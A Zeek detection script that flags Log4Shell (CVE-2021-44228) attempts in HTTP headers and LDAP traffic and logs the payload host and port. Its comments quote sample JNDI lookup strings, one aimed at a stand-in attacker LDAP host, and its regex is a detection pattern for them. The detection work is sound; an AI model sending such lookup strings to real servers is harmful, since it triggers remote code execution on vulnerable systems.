module CVE_2021_44228;
# Refer to the following for a description of the methods used in script.
# Headers: https://corelight.com/blog/simplifying-detection-of-log4shell
# LDAP:    https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic

@load-sigs ./ldap_java.sig

export {
    # Notice types contributed by this package. LOG4J_ATTEMPT_HEADER is raised
    # from the http_header handler and LOG4J_LDAP_JAVA from the signature_match
    # handler; LOG4J_SUCCESS is declared here but not raised in this file.
    redef enum Notice::Type += {
        LOG4J_ATTEMPT_HEADER,
        LOG4J_LDAP_JAVA,
        LOG4J_SUCCESS
    };

    # When T, every reported header match is also written to the log stream.
    option log = T;
    # Redefined by the btest suite when running tests. Leave as `F`.
    option run_tests = F;

    # Payload hosts to ignore. They can be domains or addresses, hence strings.
    option ignorable_target_hosts: set[string] = {};
    # Originators known to be benign scanners for this behavior.
    # NOTE(review): the two /22 entries at the end already contain some of the
    # /23 entries listed before them; the list is kept exactly as configured.
    option ignorable_orig_hosts: set[subnet] = {
        10.96.64.0/23,
        10.96.66.0/23,
        10.96.68.0/23,
        10.5.114.0/23,
        10.189.56.0/23,
        10.189.58.0/23,
        10.189.60.0/23,
        10.205.62.224/28,
        10.205.63.224/28,
        10.203.63.32/28,
        10.203.63.48/28,
        10.187.13.32/28,
        10.187.13.48/28,
        10.96.64.0/22,
        10.189.56.0/22
    };
    # Responders to ignore. `ignorable_orig_hosts` is probably what you want.
    # This one is meant for (1) internal honeypots that you know will look
    # "exploitable" or (2) a known "malicious" server attempting to exploit
    # vulnerable Java clients.
    option ignorable_resp_hosts: set[addr] = {};

    # Try to normalize payloads to improve the chance of successfully
    # retrieving the payload information.
    option try_normalize = T;

    # Identifier of the log stream created in zeek_init().
    redef enum Log::ID += { LOG };

    # Path (file name stem) of the log stream; redef-able.
    const log_path = "log4j" &redef;

    # Policy hook handed to Log::create_stream() for this stream.
    global log_policy: Log::PolicyHook;
}

# Tag added to the HTTP record of any request whose headers matched
# `exploit_pattern`.
redef enum HTTP::Tags += { LOG4J_RCE };


# Columns of the log stream created in zeek_init(). One record is written per
# header name/value that matched and was not ignored.
type Info: record {
    # Network time at which the matching header was handled.
    ts:            time   &log;
    # Unique ID of the connection that carried the header.
    uid:           string &log;
    # URI of the HTTP request, or "" when it is not available.
    http_uri:      string &log;
    # Payload URI as extracted by parse_payload().
    uri:           string &log;
    # Payload stem (the part of `uri` before the first "/").
    stem:          string &log;
    # Payload host taken from the stem.
    target_host:   string &log;
    # Payload port taken from the stem; kept as a string ("-" when missing).
    target_port:   string &log;
    # HTTP request method, or "" when it is not available.
    method:        string &log;
    # Direction flag passed to the http_header event.
    is_orig:       bool   &log;
    # Header name as passed to the http_header event.
    name:          string &log;
    # Header value as passed to the http_header event.
    value:         string &log;
    # T if `exploit_pattern` was found in the header name.
    matched_name:  bool   &log;
    # T if `exploit_pattern` was found in the header value.
    matched_value: bool   &log;
};

# Pieces of a payload as returned by parse_payload(). Fields that could not be
# split out hold the "-" default of safe_split1_w_default().
type PayloadParts: record {
    # Payload URI (text up to the first "}").
    uri:   string;
    # Part of `uri` before the first "/".
    stem:  string;
    # Part of `stem` before the first ":".
    host:  string;
    # Part of `stem` after the first ":"; trailing underscore because `port`
    # is a Zeek type name.
    port_: string;
};

# Very general, FPs expected but we're casting a wide net intentionally.
# Approach:
# Match ${
# unless it is immediately followed by @ (i.e. ${@, PHP junk),
# and only if a : appears somewhere in the middle
# and there is a closing brace.
# Neither side of the : may be empty or contain a }.
# See the package's test cases for what we consider to be a TP/FP.
# NOTE(review): those test cases are not in the zeek_init() handler of this file.
global exploit_pattern: pattern = /\$\{[^@][^}]+:[^}]+\}/;

# Stack used for `normalize`. Shouldn't be used outside of that function.
# It is a module-level global manipulated through peek()/pop()/push(), so its
# contents persist between calls until clear_stack() resets it.
global stack: vector of string;

# Returns the most recently pushed element of `stack` without removing it, or
# "" when the stack is empty.
function peek(): string
    {
    local depth = |stack|;
    return depth > 0 ? stack[depth - 1] : "";
    }

# Removes and returns the most recently pushed element of `stack`. Returns ""
# and leaves the stack untouched when it is already empty.
function pop(): string
    {
    local depth = |stack|;
    if ( depth == 0 )
        return "";

    local top = stack[depth - 1];
    # Keep everything except the last element.
    stack = stack[0:depth - 1];
    return top;
    }

# Appends `x` to the top of `stack`.
function push(x: string)
    {
    # Assigning to the index one past the end grows the vector by one.
    stack[|stack|] = x;
    }

# Resets `stack` to an empty vector.
function clear_stack()
    {
    # An uninitialized local of vector type starts out empty.
    local empty_stack: vector of string;
    stack = empty_stack;
    }

# Attempts to normalize log4j payload to remove most common obfuscations. There
# are effectively an infinite number of ways to do this, so don't expect it to
# cover everything. See the package's tests to understand what it handles.
#
# Algorithm works as follows:
#
# "$" and "{" are pushed onto the stack when encountered.
# Set a flag to show we have seen the first "$" "{" set.
# If we are on our second+ set of "$" "{", start ignoring characters
# If we see a ":" while ignoring, we have passed the function portion and should stop ignoring.
# When we hit a "}", pop the previous "{" and "$" off the stack. If the stack is
# now empty, this was the first instance (i.e., `${jndi...`) and it should be
# preserved, otherwise, remove it.
#
# Example: "${${lower:j}ndi}" becomes "${jndi}".
#
# Returns the payload with the marked characters removed. Uses the
# module-level `stack` as scratch space and clears it before returning.
function normalize(payload: string): string
    {
    # Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j}
    payload = gsub(payload, /::\-/, ":");
    # Indices of characters in `payload` that will be dropped from the result.
    local to_remove: set[count];
    local i = 0;
    # T while inside the "function name" part of a nested lookup, i.e. between
    # a second+ "{" and the next ":".
    local ignoring = F;
    # T once the first "{" has been seen.
    local saw_first = F;
    while ( i != |payload| )
        {
        local c = payload[i];
        switch ( c )
            {
            case "$":
                # Every "$" is pushed, whether or not a "{" follows it.
                push(c);
                break;
            case "{":
                # Only a "{" directly after a pushed "$" goes onto the stack.
                if ( peek() == "$" )
                    push(c);
                # NOTE(review): the bookkeeping below runs for every "{", even
                # one that was not preceded by "$". In that case the character
                # before a second+ "{" is still marked for removal.
                if ( !saw_first )
                    {
                    saw_first = T;
                    }
                else
                    {
                    # Add previous "$"
                    add to_remove[i-1];
                    ignoring = T;
                    }
                break;
            case ":":
                # The ":" ends the ignored function-name portion and is itself
                # removed.
                if ( ignoring )
                    {
                    add to_remove[i];
                    ignoring = F;
                    }
                break;
            case "}":
                local open_brace = pop();
                local dollar = pop();
                # We only want to remove internal ones
                if ( dollar == "$" && open_brace == "{" && |stack| > 0 )
                    add to_remove[i];
                break;
            }

        # While ignoring, every character is dropped. This includes the "{"
        # that switched ignoring on. NOTE(review): if no ":" follows, ignoring
        # stays on and the rest of the payload is removed.
        if ( ignoring )
            add to_remove[i];
        ++i;
        }

    # Rebuild the payload from the characters that were not marked.
    local new_payload: vector of string;
    i = 0;
    while ( i != |payload| )
        {
        if ( i !in to_remove )
            new_payload += payload[i];
        ++i;
        }
    # Unbalanced input can leave entries behind; reset for the next call.
    clear_stack();
    return join_string_vec(new_payload, "");
    }

# Splits `s` at the first match of `p` and returns piece number `idx`
# (0 = text before the match, 1 = text after it). When the split did not
# produce that many pieces, `missing` is returned instead (default "-").
function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string
    {
    local pieces = split_string1(s, p);
    if ( idx >= |pieces| )
        return missing;

    return pieces[idx];
    }

# Assumes `name` or `value` string passed as `s` has the structure:
# ${jndi:ldap://payload_host:payload_port/path} for the payload. Many examples
# of more complicated obfuscation exist. If the structure is different, fill
# missing fields with "-" so other structures in the wild can be explored in the
# logs. For example, Binary Edge are using the following type of obfuscation:
# ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}'
#
# The host is taken from what follows the FIRST "//" after the first "${".
# Splitting on the last "//" instead would let the attacker choose the reported
# host by appending "//anything" to the path, e.g.
# ${jndi:ldap://evil.example:1389/a//allowed.example}. That host is compared
# against `ignorable_target_hosts`, so it could silence the notice.
#
# s: header name or value that matched `exploit_pattern`.
#
# Returns: the URI, stem, host and port of the payload.
function parse_payload(s: string): PayloadParts
    {
    if ( try_normalize )
        s = normalize(s);

    # Start at the lookup itself so that a "//" earlier in the header (such as
    # the "http://" of a Referer value) is not mistaken for the payload's.
    local lookup = safe_split1_w_default(s, /\$\{/, 1, s);

    # Text after the first "//" of the lookup. When there is no "//", fall back
    # to the whole string so unexpected structures still show up in the logs.
    local after_slashes = safe_split1_w_default(lookup, /\/\//, 1, s);

    local payload_uri  = safe_split1_w_default(after_slashes, /\}/, 0);
    local payload_stem = safe_split1_w_default(payload_uri, /\//, 0);
    local payload_host = safe_split1_w_default(payload_stem, /\:/, 0);
    local payload_port = safe_split1_w_default(payload_stem, /\:/, 1);

    return PayloadParts($uri=payload_uri, $stem=payload_stem, $host=payload_host, $port_=payload_port);
    }

# Reports one matching header part (`matched_text` is either the header name or
# the header value): parses the payload, raises LOG4J_ATTEMPT_HEADER and, when
# the `log` option is set, writes a record to the log stream. Does nothing if
# the payload host is listed in `ignorable_target_hosts`.
function report_header_match(c: connection, is_orig: bool, name: string, value: string,
                             matched_text: string, matched_name: bool, matched_value: bool,
                             http_uri: string, http_method: string)
    {
    local payload = parse_payload(matched_text);
    if ( payload$host in ignorable_target_hosts )
        return;

    local info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
    NOTICE([$note=LOG4J_ATTEMPT_HEADER,
            $conn=c,
            $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
            # $suppress_for=3600sec,
            $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
            $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]);
    if ( log )
        Log::write(LOG, info);
    }

# Checks every HTTP header for `exploit_pattern`. A match in the header name
# and a match in the header value are reported independently, so an ignorable
# payload host in one of them does not hide the other.
event http_header(c: connection, is_orig: bool, name: string, value: string)
    {
    if ( c$id$orig_h in ignorable_orig_hosts )
        return;
    if ( c$id$resp_h in ignorable_resp_hosts )
        return;

    # Focus is mainly on client headers, but not filtering right now to explore interesting cases in the wild
    # if (!is_orig)
    #     return;
    # Focus is mainly on value of header, but adding 'name' to explore what is being used in the wild
    local matched_name = exploit_pattern in name;
    local matched_value = exploit_pattern in value;
    if ( !matched_name && !matched_value )
        return;

    # Ignore matches that contain binary goop. This was a large contributor to
    # false positives.
    if ( matched_name && !is_ascii(name) )
        return;
    if ( matched_value && !is_ascii(value) )
        return;

    local http_uri = "";
    local http_method = "";

    # c$http is an optional field; only read or tag it when it exists.
    if ( c?$http )
        {
        # Handle potentially missing fields
        if ( c$http?$uri )
            http_uri = c$http$uri;
        if ( c$http?$method )
            http_method = c$http$method;
        add c$http$tags[LOG4J_RCE];
        }

    # TODO: add to a clusterized set for watching of subsequent traffic (LOG4J_SUCCESS notice).
    if ( matched_name )
        report_header_match(c, is_orig, name, value, name, matched_name, matched_value, http_uri, http_method);
    if ( matched_value )
        report_header_match(c, is_orig, name, value, value, matched_name, matched_value, http_uri, http_method);
    }

# Raises LOG4J_LDAP_JAVA when one of this package's two signatures fires.
# The matched data is passed through as the notice's sub field.
# NOTE(review): the signatures are presumably the ones in ./ldap_java.sig,
# which is loaded at the top of this file.
event signature_match(state: signature_state, msg: string, data: string)
    {
    # Any other signature is none of our business.
    if ( msg != "log4j_javaclassname_udp" && msg != "log4j_javaclassname_tcp" )
        return;

    local matched_conn = state$conn;
    local endpoints = matched_conn$id;

    NOTICE([$note=LOG4J_LDAP_JAVA,
            $conn=matched_conn,
            $identifier=cat(endpoints$orig_h,endpoints$resp_h,endpoints$resp_p),
            # $suppress_for=3600sec,
            $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload."),
            $sub=data]);
    }

# Registers this package's log stream: columns come from `Info`, the path from
# `log_path` and the policy hook from `log_policy`.
event zeek_init() &priority=5
    {
    local stream = Log::Stream($columns=Info, $path=log_path, $policy=log_policy);
    Log::create_stream(CVE_2021_44228::LOG, stream);
    }